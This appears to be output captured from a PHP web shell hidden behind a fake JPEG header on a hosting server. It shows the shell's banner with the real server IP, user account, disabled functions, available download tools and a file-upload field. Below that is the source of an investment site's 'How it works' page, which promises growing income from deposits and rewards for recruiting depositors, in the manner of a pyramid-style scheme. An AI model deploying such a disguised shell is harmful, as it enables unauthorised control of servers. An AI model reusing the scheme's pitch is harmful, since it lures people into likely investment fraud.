���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/arbtrade.in/public_html/ |
Upload File : |
<?php include_once 'header.php' ?> <!-- head --> <div class="section section--head"> <div class="container"> <div class="row"> <!-- title --> <div class="col-12 col-md-10 offset-md-1 col-lg-6 offset-lg-3"> <div class="section__title"> <h1>How it works?</h1> <p>We have prepared a detailed instruction on working with <?= $comp_name ?>. After studying it, you will understand how to invest and make a profit.</p> </div> </div> <!-- end title --> </div> </div> </div> <!-- end head --> <!-- steps --> <div class="section"> <div class="container"> <div class="row"> <div class="col-12"> <!-- step --> <div class="step"> <h3 class="step__title">Register on the platform</h3> <p class="step__text">Create an account in the system by filling in your login, E-mail and password in the form. In just a few clicks you will be able to access your personal account.</p> <!-- design elements --> <span class="block-icon block-icon--orange"> <i class="ti ti-number-1"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> <!-- end step --> </div> <div class="col-12"> <!-- step --> <div class="step"> <h3 class="step__title">Choose an investment plan</h3> <p class="step__text">Check out the lineup of our investment offerings, and determine the deposit plan that works best for you.</p> <!-- design elements --> <span class="block-icon block-icon--green"> <i class="ti ti-number-2"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> <!-- end step --> </div> <div class="col-12"> <!-- step --> <div class="step"> <h3 class="step__title">Make a deposit</h3> <p class="step__text">Authorize, replenish your balance by any convenient way. In the "My Investments" section, open a deposit for any amount in accordance with the requirements of the investment plan you have chosen.</p> <!-- design elements --> <span class="block-icon block-icon--blue"> <i class="ti ti-number-3"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> <!-- end step --> </div> <div class="col-12"> <!-- step --> <div class="step"> <h3 class="step__title">Invite new partners</h3> <p class="step__text">All investors you have attracted become your referrals. From each deposit they make, you will receive a reward on your balance.</p> <!-- design elements --> <span class="block-icon block-icon--yellow"> <i class="ti ti-number-4"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> <!-- end step --> </div> <div class="col-12"> <!-- step --> <div class="step"> <h3 class="step__title">Watch your income grow</h3> <p class="step__text">You will receive investment income from deposits, as well as affiliate rewards. All earned funds will be credited to your balance in the system.</p> <!-- design elements --> <span class="block-icon block-icon--purple"> <i class="ti ti-number-5"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> <!-- end step --> </div> <div class="col-12"> <!-- step --> <div class="step"> <h3 class="step__title">Withdraw accumulated profits</h3> <p class="step__text">Order payments of earned money, enjoy the growth of your wealth, do not deny yourself in pleasures, make gifts to your family and friends!</p> <!-- design elements --> <span class="block-icon block-icon--red"> <i class="ti ti-number-6"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> <!-- end step --> </div> <div class="col-12"> <!-- section btns --> <div class="section__btns"> <a href="signin" class="section__btn">Register</a> </div> <!-- end section btns --> </div> </div> </div> </div> <!-- end steps --> <!-- question --> <section class="section"> <div class="container"> <div class="row row--relative"> <div class="col-12"> <div class="question"> <h2 class="question__title">Any questions?</h2> <p class="question__text">Our support team is always on call, and ready to help with all your questions!</p> <div class="section__btns section__btns--mt"> <button class="section__btn section__btn--light" data-bs-target="#modal-ask" type="button" data-bs-toggle="modal">Ask a question</button> </div> <!-- design elements --> <span class="block-icon block-icon--orange"> <i class="ti ti-info-circle"></i> </span> <span class="screw screw--lines-bl"></span> <span class="screw screw--lines-br"></span> <span class="screw screw--lines-tr"></span> </div> </div> <!-- animation background --> <div class="section__canvas section__canvas--second" id="canvas2"></div> </div> </div> </section> <!-- end question --> <?php include_once 'footer.php' ?>